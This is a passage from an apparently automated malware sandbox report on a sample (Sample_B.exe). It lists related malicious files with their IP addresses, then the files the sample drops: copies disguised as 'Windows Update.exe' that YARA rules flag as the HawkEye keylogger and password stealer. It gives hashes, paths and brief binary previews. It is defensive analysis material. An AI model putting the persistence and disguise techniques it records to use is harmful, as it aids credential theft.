                                                                                • 104.20.184.68
                                                                                index_2021-02-17-11_45.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                f_0008a8.exeGet hashmaliciousBrowse
                                                                                • 104.16.18.94
                                                                                RibermoldOrder 180827.exeGet hashmaliciousBrowse
                                                                                • 172.67.188.154
                                                                                index_2021-02-17-11_45.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                f6TW7Ob4aY.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                ew2c3sE5Po.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                TPYY2n7hzn.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                ZXKG6rCJwg.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                YWOro8qqYg.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                cRoVRprbi1.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                45tj9pDUII.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                3I3ECIc9us.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                VifzEYDt4f.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                aMvqQZ69tk.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                BpV9PHuNll.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                dxjcxlYNoQ.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                wildix-collaboration-mobile.apkGet hashmaliciousBrowse
                                                                                • 104.22.10.83
                                                                                GOOGLEUSf_0008a8.exeGet hashmaliciousBrowse
                                                                                • 8.8.4.4
                                                                                wildix-collaboration-mobile.apkGet hashmaliciousBrowse
                                                                                • 142.250.180.131
                                                                                mWxzYlRCUi.exeGet hashmaliciousBrowse
                                                                                • 34.102.136.180
                                                                                wildix-collaboration-mobile.apkGet hashmaliciousBrowse
                                                                                • 142.250.184.42
                                                                                Credit Card & Booking details.exeGet hashmaliciousBrowse
                                                                                • 34.102.136.180
                                                                                DnHeI10lQ6.exeGet hashmaliciousBrowse
                                                                                • 34.102.136.180
                                                                                q9xB9DE3RA.exeGet hashmaliciousBrowse
                                                                                • 34.102.136.180
                                                                                Cargo_remitP170201.xlsxGet hashmaliciousBrowse
                                                                                • 34.102.136.180
                                                                                OEVGVSOGAH.dllGet hashmaliciousBrowse
                                                                                • 216.58.206.65
                                                                                LeaveHomeSafe_1.1.4_#U5b89#U5fc3#U72483.apkGet hashmaliciousBrowse
                                                                                • 142.250.184.42
                                                                                plutonium.exeGet hashmaliciousBrowse
                                                                                • 8.8.8.8
                                                                                Quotation.exeGet hashmaliciousBrowse
                                                                                • 34.102.136.180
                                                                                sBt_8xKw.apkGet hashmaliciousBrowse
                                                                                • 216.58.198.42
                                                                                cLMBOaIYSO.exeGet hashmaliciousBrowse
                                                                                • 35.228.43.35
                                                                                51BfqRtUI9.exeGet hashmaliciousBrowse
                                                                                • 34.102.136.180
                                                                                X2Q8MaK1Zm.docxGet hashmaliciousBrowse
                                                                                • 216.58.208.131
                                                                                X2Q8MaK1Zm.docxGet hashmaliciousBrowse
                                                                                • 172.253.120.155
                                                                                dAIyRK9gO7.exeGet hashmaliciousBrowse
                                                                                • 8.8.8.8
                                                                                SU9Gm5Pom3.exeGet hashmaliciousBrowse
                                                                                • 34.105.243.4
                                                                                9j4sD6PmsW.exeGet hashmaliciousBrowse
                                                                                • 34.102.136.180

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):914
                                                                                Entropy (8bit):7.367371959019618
                                                                                Encrypted:false
                                                                                SSDEEP:24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
                                                                                MD5:E4A68AC854AC5242460AFD72481B2A44
                                                                                SHA1:DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
                                                                                SHA-256:CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
                                                                                SHA-512:5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: 0...0..v........:......(d.....0...*.H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0...*.H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90...*.H.............`g(.o.Hc.1..g..}<.J...+.._sw*2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G*=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq..*.O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                Category:dropped
                                                                                Size (bytes):59134
                                                                                Entropy (8bit):7.995450161616763
                                                                                Encrypted:true
                                                                                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):252
                                                                                Entropy (8bit):3.0734220895273965
                                                                                Encrypted:false
                                                                                SSDEEP:6:kKbgP4LDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:EQLutWOxSW0zeYrsMlU/
                                                                                MD5:DEFF45D6EE453F2E606204F981D12C2A
                                                                                SHA1:37196590CCAB4D0DA1ECF8A2C7CD5D3B9057DF9E
                                                                                SHA-256:E9D137AC1323596442F223D79DE22A4A34980B7BC84BD51EA5B7EDD07A2994E2
                                                                                SHA-512:4F18E2CAA196C0C6910B28C0F74BCDF1ADC35DB1395CA7F3C7F00925EB9454FF76F729E17916B57F845CD06FC49CD25D24F32E57346972DE36BBC9C455DDD853
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: p...... ....j...5..nz...(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):328
                                                                                Entropy (8bit):3.080958610796429
                                                                                Encrypted:false
                                                                                SSDEEP:6:kKPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:+3kPlE99SNxAhUeo+aKt
                                                                                MD5:5DE2DFA843897E36DAC2D1F4FCB7F360
                                                                                SHA1:717349376361E7175072835A0051A855DBF32BC8
                                                                                SHA-256:EB01F1C833C14A267597922655659DE490CBF8548F7C46B305C44896A2E8886C
                                                                                SHA-512:F463646650855F0493117ACC769D77DA705C69F7F1880AED8A17689223F5F2839C6340668A9222DCC884C98E64D32EC40C85E356CC62964D3BA77B5DFA6D809D
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: p...... .........|Lnz...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_windows update.e_8def7a6b85a0513a7da3debaf0f7a2c3a14caff_0b1db1a4\Report.wer
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):13186
                                                                                Entropy (8bit):3.716046470811688
                                                                                Encrypted:false
                                                                                SSDEEP:192:oTyzzRiyXg9uclA90TfxtdOZC0fFj6IGbQA3ai63yOt7:lzRi4yTOhGmr
                                                                                MD5:EF7C318F45EBB3503516CC69659E9F7B
                                                                                SHA1:D414EF598B7B337B1132FB28DD4B80C43D479E06
                                                                                SHA-256:A74CC73AED01F82B779695EF91898E57CA039EAEF67747838793658E5FFC3AB4
                                                                                SHA-512:ED4B52B026CDB3276F93C8349CDEF77F5DCC21D1C6D521D4402C5B29398A6DA748B9836BA74FE0D23F6892FE4882E3A6FD424BBEFEE71582822A0BFEC49B44FB
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.0.7.3.7.3.9.2.8.1.8.3.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.0.7.3.7.4.0.8.3.7.0.4.3.0.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.0.7.6.8.f.3.-.7.1.6.d.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....W.O.W.6.4.=.1.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.I.d.=.4.9.8.8.7.0.9.8.9.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.T.a.b.l.e.=.5.1.2.1.7.6.3.3.1.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.P.r.o.b.l.e.m. .S.i.g.n.a.t.u.r.e. .0.1.....S.i.g.[.0.]...V.a.l.u.e.=.w.i.n.d.o.w.s. .u.p.d.a.t.e...e.x.e.....S.i.g.[.1.]...N.a.m.e.=.P.r.o.b.l.e.m. .S.i.g.n.a.t.u.r.e. .0.2.....S.i.g.[.1.]...V.a.l.u.e.=.1...0...0...0.....S.i.g.[.2.]...N.a.m.e.=.P.r.o.b.l.e.m. .S.i.g.n.a.t.u.r.e. .0.3.....S.i.g.[.2.]...V.a.l.u.e.=.6.0.1.6.c.1.0.9.....S.i.g.[.3.]...N.a.m.e.=.P.r.o.b.l.e.m. .S.i.g.n.a.t.u.r.e. .0.4.....S.i.g.[.3.]...V.a.l.u.e.=.P.h.u.l.l.i.....S.i.g.[.4.]...
                                                                                C:\Users\user\AppData\Local\Temp\CabAB00.tmp
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                Category:dropped
                                                                                Size (bytes):59134
                                                                                Entropy (8bit):7.995450161616763
                                                                                Encrypted:true
                                                                                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                C:\Users\user\AppData\Local\Temp\SysInfo.txt
                                                                                Process:C:\Users\user\Desktop\Sample_B.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):35
                                                                                Entropy (8bit):4.226150431961057
                                                                                Encrypted:false
                                                                                SSDEEP:3:oNSzORW2EM:oNSzOA2v
                                                                                MD5:6A5A5B0A44E4EB0E35D0ED1ED597CB58
                                                                                SHA1:1EAE2A59836272E8B62BD8AF9F231E5FF23BC8AB
                                                                                SHA-256:A4DB033255E7CEDD4E48A95805F033DD9A3A1AF789440EB627878C1C944C7483
                                                                                SHA-512:F21D968FE9400557E881BA3C354073659AA68E0B30D4485D519887ACF62A699730CE59B701D9245056D629C0D25C7F117E64A313B7CE37B6C6737FD9BD6E655F
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: C:\Users\user\Desktop\Sample_B.exe
                                                                                C:\Users\user\AppData\Local\Temp\TarAB01.tmp
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):152788
                                                                                Entropy (8bit):6.316654432555028
                                                                                Encrypted:false
                                                                                SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                                MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                                SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                                SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                                SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                C:\Users\user\AppData\Local\Temp\WERA42C.tmp.WERInternalMetadata.xml
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):2626
                                                                                Entropy (8bit):3.657382504384408
                                                                                Encrypted:false
                                                                                SSDEEP:48:yeRipPp6uhzrkG/wU6Gww7VxpAFgYkbkiQG5zepMVOfyi+Sqw+PjsMS+MbPx2xSQ:Shz4tU6o7VxBt33tJ3uE3
                                                                                MD5:BB7B91CA690F827AF3B229CB8B174191
                                                                                SHA1:6749797C84D4B0B279BD6C887B07CB16ECD9D156
                                                                                SHA-256:A7DD4AC1387116D03AC3C70E3074DCAB3E3B8EB864E2304195F86F1B81923575
                                                                                SHA-512:ADA582C7A441E85028A09DB2DD2C092D0AD67A0CC69BAE00BAD0ED3A2188DC88A1CCBAC6822AE9BA558CE2B7DAEA7C4666AF907EA2BF2AB7AD0A2B55E1820176
                                                                                Malicious:false
                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.b.l.e.m.S.i.g.n.a.t.u.
                                                                                C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                Process:C:\Users\user\Desktop\Sample_B.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):533504
                                                                                Entropy (8bit):6.5061470317531676
                                                                                Encrypted:false
                                                                                SSDEEP:6144:1ulqe1RKbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9e:MRKQtqB5urTIoYWBQk1E+VF9mOx9Oi
                                                                                MD5:78300BD48D50FA7E5F3F6A933CC5F739
                                                                                SHA1:03157F27B0D5141465ADEEAF9B3A7B5F3E60F614
                                                                                SHA-256:424212E76C0E660538EE49126079980B34F4DD343E002004F67EA71A937AF5E3
                                                                                SHA-512:18B015CA0B4DE297195E97BA95872C1485FE55A1D89B7FBDD82769A912E0FBB3825975105E5712356FFED525516D7EF3F482F46CE873E9B4315956F2E2A491E7
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Arnim Rupp
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: JPCERT/CC Incident Response Group
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................4........... ........@.. ....................................@.....................................W.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`......."..............@..B........................H.......0}..d..............X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                                C:\Users\user\AppData\Roaming\Windows Update.exe:Zone.Identifier
                                                                                Process:C:\Users\user\Desktop\Sample_B.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):26
                                                                                Entropy (8bit):3.95006375643621
                                                                                Encrypted:false
                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                Malicious:true
                                                                                Preview: [ZoneTransfer]....ZoneId=0
                                                                                C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):533504
                                                                                Entropy (8bit):6.5061470317531676
                                                                                Encrypted:false
                                                                                SSDEEP:6144:1ulqe1RKbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9e:MRKQtqB5urTIoYWBQk1E+VF9mOx9Oi
                                                                                MD5:78300BD48D50FA7E5F3F6A933CC5F739
                                                                                SHA1:03157F27B0D5141465ADEEAF9B3A7B5F3E60F614
                                                                                SHA-256:424212E76C0E660538EE49126079980B34F4DD343E002004F67EA71A937AF5E3
                                                                                SHA-512:18B015CA0B4DE297195E97BA95872C1485FE55A1D89B7FBDD82769A912E0FBB3825975105E5712356FFED525516D7EF3F482F46CE873E9B4315956F2E2A491E7
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Arnim Rupp
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: JPCERT/CC Incident Response Group
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................4........... ........@.. ....................................@.....................................W.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`......."..............@..B........................H.......0}..d..............X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                                C:\Users\user\AppData\Roaming\WindowsUpdate.exe:Zone.Identifier
                                                                                Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):26
                                                                                Entropy (8bit):3.95006375643621
                                                                                Encrypted:false
                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                Malicious:true
                                                                                Preview: [ZoneTransfer]....ZoneId=0
                                                                                C:\Users\user\AppData\Roaming\pid.txt
                                                                                Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):4
                                                                                Entropy (8bit):2.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:8:8
                                                                                MD5:4EBD440D99504722D80DE606EA8507DA
                                                                                SHA1:53127AFA9428C4B39465D8FAFFEA4891967FDD3D
                                                                                SHA-256:BA977EDD7884F62CD595D30DC746605253AC8E5700B135AD515AAC7ADAFA512C
